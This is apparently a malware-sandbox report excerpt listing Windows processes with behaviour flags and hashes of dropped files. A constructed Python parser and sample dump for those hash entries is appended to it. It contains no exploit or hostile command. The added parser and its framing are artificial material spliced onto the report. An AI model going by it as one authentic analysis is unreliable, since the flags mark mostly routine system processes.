C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  (PID 3976)
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc  (PID 4044)
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}  (PID 4372)
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc  (PID 4452)
C:\Windows\system32\SppExtComObj.exe -Embedding  (PID 4956)
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager  (PID 4928)
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  (PID 1008)
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc  (PID 1832)
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  (PID 4308)
  - Modifies data under HKEY_USERS
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service  (PID 3896)
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  (PID 2332)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  (PID 4748)
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc  (PID 1380)
C:\Windows\System32\RuntimeBroker.exe -Embedding  (PID 4944)
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  (PID 1440)
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc  (PID 3868)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  (PID 240)
  - Modifies data under HKEY_USERS
C:\Windows\System32\CompPkgSrv.exe -Embedding  (PID 1724)
C:\Windows\System32\CompPkgSrv.exe -Embedding  (PID 2932)
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClippingHost.exe" -ServerName:ScreenClipping.AppX6726kd2wrry6c6n8nc57a1zn08dmzmbt.mca  (PID 2004)
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\svchost.exe -k LocalService -p -s CaptureService  (PID 4936)
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca  (PID 2184)
    C:\Windows\system32\WerFault.exe -u -p 2184 -s 932  (PID 2788)
      - Checks processor information in registry
      - Enumerates system info in registry
C:\Windows\System32\svchost.exe -k WerSvcGroup  (PID 4636)
  - Suspicious use of NtCreateUserProcessOtherParentProcess
    C:\Windows\system32\WerFault.exe -pss -s 408 -p 2184 -ip 2184  (PID 2304)
      - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\System32\RuntimeBroker.exe -Embedding  (PID 3452)
  - Modifies registry class
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  (PID 424)
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  (PID 2012)
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1  (image C:\Windows\system32\BackgroundTransferHost.exe, PID 1604)
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  (PID 3048)
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  (PID 804)
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  (PID 1272)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 13KB
  MD5:    48223b707155423a8edc7e4b3d42af93
  SHA1:   9d5c65a4d422ef899d8874ac9b3a4b9a67cc69ef
  SHA256: 457f918e8726062f32561e5e6482627b5fe16c5c9cf38057df9cb593f6dc95db
  SHA512: ffd84b8391c18c7dfd97b48973d317ee7252a591d0bb03dd14df5bbce14264fa2794fd1c784fc04efb67430efa76ba75d04ca57edff34a7cdf64f096ae431178
- Filesize: 36KB
  MD5:    bb07422e64a9a9e636e64dfa3cc5740f
  SHA1:   d78b59a243bb6e0954581a6804ec786df13b7f2a
  SHA256: 431d2375b55a10ef206cc104ab7a35db6864a6000a50b69d6731db7303002f1d
  SHA512: c1a601f7e910fb310d75320ecd3c68419aa4c1eb7e8f6751ef80eb3e618d62208453bd537f7c2735cdd62658022b751ba83ce2eb2a5492994490a6a4eed43c8b
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  Filesize: 471B
  MD5:    d4e65813d7b8f8d34312fcd3c6f4a0f4
  SHA1:   2a53832fdd5e9b29190a0a8fae0fb0c75944c021
  SHA256: 2ee66b84c98ae410d13287a9e814aa5518e8435de1d9206fc6be066df18bca50
  SHA512: eb517db854ca5ffc1faa6678da2be0b78c0da9fb94c3770a323cb53761fd2e36100671f266cd259d717f91f164362ceaefa92513cd9ecd9656c38a294dd64310
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
  Filesize: 338B
  MD5:    eb25d527fd708e9cccaa9e801ebd4708
  SHA1:   c5b15ec7b0dbabe9f6d21e20eb1e7359f9fdeba9
  SHA256: 02432cd21e6259cf9f1f3863cacdde7de11a8ad1c313296a4175f08e5dc7a392
  SHA512: d137e418065f1e61a1873ae7c89c2685d80b90bad90967567b86dfeb4e7ec1b80121ad5a8faa581ca22f66a8a4ec3842383b77e239de97ae7aa1b0c709dc382e
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
  Filesize: 404B
  MD5:    29f281593c544200a5687bc89933d081
  SHA1:   0c661af2138755280e2dbad222c128ddc982871f
  SHA256: 0f25c5bcc55fd3954235c2b6631a30ba5da459e261cf85743565c02bd2f0a469
  SHA512: 5cddd0c9f32b8d3f40fcc921b513061627ea4294aa4fd017be67ed40c038c318f9822b58fcb9bcc9aa3b211a744f5e1e1fddcd9a4fbdf2237d8827a2f5018811
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
  Filesize: 330B
  MD5:    21bb3948fba8fb269f5bbb3a1a3a439e
  SHA1:   0c86ee44a6dd55ae0c6a03cf288b86c51628af16
  SHA256: 6c34ee3e61653029f0c1165caa622c02c561465e5e5f2796744ec76bf7b18d6b
  SHA512: a8c857b369984eb7be57a1e3db51f5baac961832aa66b62f72b8cf0f8e167c763adb48fbff91b811a36ae46cfae3211bb8df15b7abd5721b46ccd4d8d6b55448
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
  Filesize: 330B
  MD5:    075de34db583b232155b45e76c9af5ae
  SHA1:   1b9c97711a79df60e8be79bbbbb6c18cdb94380c
  SHA256: f9eed2a35eba6db6ea4d47fae5a51a19d230e910f66b9f3ef93df075feda5242
  SHA512: f07857ddf704e05061d7f791b55938d438489908bb626b05f22bb8d41ce8e7066db423d6d85067a44ac6f5ee5dca7aa560b6751645e75f11efd3866afe0ea03c
- Filesize: 152B
  MD5:    d0f84c55517d34a91f12cccf1d3af583
  SHA1:   52bd01e6ab1037d31106f8bf6e2552617c201cea
  SHA256: 9a24c67c3ec89f5cf8810eba1fdefc7775044c71ed78a8eb51c8d2225ad1bc4c
  SHA512: 94764fe7f6d8c182beec398fa8c3a1948d706ab63121b8c9f933eef50172c506a1fd015172b7b6bac898ecbfd33e00a4a0758b1c8f2f4534794c39f076cd6171
- Filesize: 152B
  MD5:    ade01a8cdbbf61f66497f88012a684d1
  SHA1:   9ff2e8985d9a101a77c85b37c4ac9d4df2525a1f
  SHA256: f49e20af78caf0d737f6dbcfc5cc32701a35eb092b3f0ab24cf339604cb049b5
  SHA512: fa024bd58e63402b06503679a396b8b4b1bc67dc041d473785957f56f7d972317ec8560827c8008989d2754b90e23fc984a85ed7496f05cb4edc2d8000ae622b
- Filesize: 264KB
  MD5:    f50f89a0a91564d0b8a211f8921aa7de
  SHA1:   112403a17dd69d5b9018b8cede023cb3b54eab7d
  SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
  SHA512: bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
- Filesize: 5KB
  MD5:    2c2685676c3cbabead460d95cc0ff79b
  SHA1:   ef5b4e68101738ddb5bd2d918ff1f66dfb01d6ac
  SHA256: 18cab470e10acb05f25ba3f83c878a008791f8067e2025551ef3cff992c68a7d
  SHA512: 1e67194e452adb9db004cd67d2820626718027c44feb37530f27908d2561a0f6d9444c833336072ab1e256d4902bf8fc084ed94ebd5ce56726e9ddfefc6aedf8
- Filesize: 5KB
  MD5:    0f38b83a7d5eb75a88c26186e1dc7517
  SHA1:   ca73331f498669054e6fd53e4773fea11f1fd66d
  SHA256: d1c984a4bbd729c2cb81295d44598d965ca3517fdd0071e16b5d76f4b4d90476
  SHA512: 5cd99108630507176b815c0ec2f7b35ff119a19203819c0303027dc2cf6f740feae119186b9547435f0c86d8699a916c929aeaf18648b23ee7461146e7794c68
- Filesize: 11KB
  MD5:    f66e1fe4f9bbecd27e3c5497b76a7123
  SHA1:   d72474f267cba1b535ccd6cbba94b6dea7976612
  SHA256: 55ca07462b0b7618113a049edf80eaad6a408391679980370be1c9646e6e85b0
  SHA512: 74c5e06d4be8431fd1d2e751c99de1555d783f683eb79e2666142d2fbac84e06c2d9126a1256e1404b1c4be2b48d2199e48bd90e89c14b8dfa80706fe8c6c8df
- Filesize: 262B
  MD5:    d734f20f82253ab1468841929053bff0
  SHA1:   6a70b89384597435c7782d8eb66455782bd682cd
  SHA256: 2021b992edf205a893a03231fe7a61e185f9ac161caef77b56ba71176345347e
  SHA512: 7a612a7bcbc49db0d8bf0c7793f13a17c81e3f481b92d04a4ec0a1787582bcaa4080f11dae83863dd137c7fddd24710337ed2155091d41d3faeaf5cd26353a37
- Filesize: 162KB
  MD5:    152e3f07bbaf88fb8b097ba05a60df6e
  SHA1:   c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
  SHA256: a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
  SHA512: 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
- Filesize: 131KB
  MD5:    bd65d387482def1fe00b50406f731763
  SHA1:   d06a2ba2e29228f443f97d1dd3a8da5dd7df5903
  SHA256: 1ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997
  SHA512: 351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9
- Filesize: 368B
  MD5:    6075322851f5d03ffaf349b60a30cf8e
  SHA1:   5889e7b4ee2d6673b844d372e7c98fa4c5690f49
  SHA256: 167d407dcb952abd01ca4d891d6c5a8200bc8e82a4b71a5756f85199baf5887e
  SHA512: f09a388c267477b1edd1b90580157c4fa85042668cdefdc3f02965bfab0029652c5842d233fe0e84c62c3d29a5d7e27165cf0e44d94983948278b888a35d9f7b
- Filesize: 409KB
  MD5:    4c2bb0618a6eda615c8001d5a7ccd6c0
  SHA1:   c88d2c8bfc5906a5cfef78893d1132edcffd71f0
  SHA256: abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
  SHA512: 6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
- Filesize: 60B
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
  Filesize: 412B
  MD5:    9d1e669349f049f62c6c596e19e9a25a
  SHA1:   4f112e61d8e788914f44e80d943f3b4f8eaeeaa8
  SHA256: 7520aa7f501102b7dc41885247acc376bf5859600183e4820cb8b9c8627e8b4e
  SHA512: 865fec8e4b55e273708216e40b7bd6e5a68dd3ce0dfc2f1811ee96c266f4f5d4c6311ea677fcd8314ff730d4947e10c020d7d1222681267cfb70d401bc44795c
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  Filesize: 2KB
  MD5:    5f4c933102a824f41e258078e34165a7
  SHA1:   d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
  SHA256: d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
  SHA512: a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    bb7d9cd87343b2c81c21c7b27e6ab694
  SHA1:   27475110d09f1fc948f1d5ecf3e41aba752401fd
  SHA256: b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
  SHA512: bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
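The Downloads list above carries, per file, a size and four digests; as the page is extracted, the label and value are frequently fused (MD5<hex>, Filesize<size>, or Filesize on one line and the size on the next) and the path is missing for most entries. The parser below is an added example, not tria.ge's code: it turns such a dump into records, uses digest length rather than the separator to tell SHA1 from SHA256 and SHA512, converts sizes to approximate bytes, and flags malformed digests. SAMPLE_DUMP is constructed from two entries of the list above, one written as the raw extraction fuses it and one with separators restored.

```python
"""Parse tria.ge-style 'Downloads' entries (path, Filesize, MD5/SHA1/SHA256/
SHA512) into records and sanity-check digest lengths. Added example, not
part of the report; it accepts 'MD5: <hex>', the fused 'MD5<hex>' form that
page extraction produces, and 'Filesize' split over two lines."""
import re

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_HEX = re.compile(r"^[0-9a-fA-F]+$")
_LABEL = re.compile(r"^(MD5|SHA1|SHA256|SHA512)", re.I)
_SIZE = re.compile(r"^Filesize\s*:?\s*(\d+(?:\.\d+)?)\s*(B|KB|MB)$", re.I)
_BARE_SIZE = re.compile(r"^(\d+(?:\.\d+)?)\s*(B|KB|MB)$", re.I)
_UNIT = {"B": 1, "KB": 1024, "MB": 1024 * 1024}   # report sizes are rounded, so bytes are approximate

# Constructed sample: two entries copied from the Downloads list in the report,
# the first as the raw extraction fused it, the second with separators restored.
SAMPLE_DUMP = r"""
-
Filesize
409KB
MD54c2bb0618a6eda615c8001d5a7ccd6c0
SHA1c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA5126abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  Filesize: 2KB
  MD5:    5f4c933102a824f41e258078e34165a7
  SHA1:   d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
  SHA256: d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
  SHA512: a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
"""


def split_digest(line: str):
    """Return (label, hex) or None. The digest length, not the separator,
    decides the label, so 'SHA1' + a hash starting with '256' is not misread."""
    for label, n in DIGEST_LEN.items():
        if line[: len(label)].upper() != label:
            continue
        rest = line[len(label):].lstrip(" :\t")
        if len(rest) == n and _HEX.match(rest):
            return label.lower(), rest.lower()
    return None


def _new_entry() -> dict:
    return {"path": None, "size": None, "size_bytes": None,
            "md5": None, "sha1": None, "sha256": None, "sha512": None, "errors": []}


def parse_downloads(text: str) -> list:
    """Split a dump into one record per '-' / '- <path>' entry."""
    entries, cur, want_size = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-" or line.startswith("- "):      # entry marker, maybe with the path
            cur = _new_entry()
            entries.append(cur)
            line = line[2:].strip()
            if not line:
                continue
        if cur is None:                                # data before any marker
            cur = _new_entry()
            entries.append(cur)
        if line.lower() == "filesize":                 # label and value on separate lines
            want_size = True
            continue
        m = _BARE_SIZE.match(line) if want_size else _SIZE.match(line)
        want_size = False
        if m:
            unit = m.group(2).upper()
            cur["size"] = m.group(1) + unit
            cur["size_bytes"] = int(float(m.group(1)) * _UNIT[unit])
            continue
        if _LABEL.match(line):
            d = split_digest(line)
            if d:
                cur[d[0]] = d[1]
            else:
                cur["errors"].append(line)             # wrong length or non-hex
            continue
        cur["path"] = line                             # anything else is the file path
    return entries


def find_by_digest(entries: list, digest: str):
    """Look an entry up by any of its digests, case-insensitively."""
    digest = digest.lower()
    for e in entries:
        if digest in (e["md5"], e["sha1"], e["sha256"], e["sha512"]):
            return e
    return None


if __name__ == "__main__":
    for e in parse_downloads(SAMPLE_DUMP):
        print(e["path"] or "(no path recorded)", e["size"], e["sha256"], e["errors"])
```

The length check matters because a fused line like SHA1<hash> gives the tokenizer no boundary: a 40-character hex run after "SHA1" is a SHA-1 even if it begins with "256", and anything that does not fit one of the four lengths lands in errors instead of silently becoming a wrong-typed digest. The records can then be joined against EDR file-hash telemetry or a blocklist by any of the four digests.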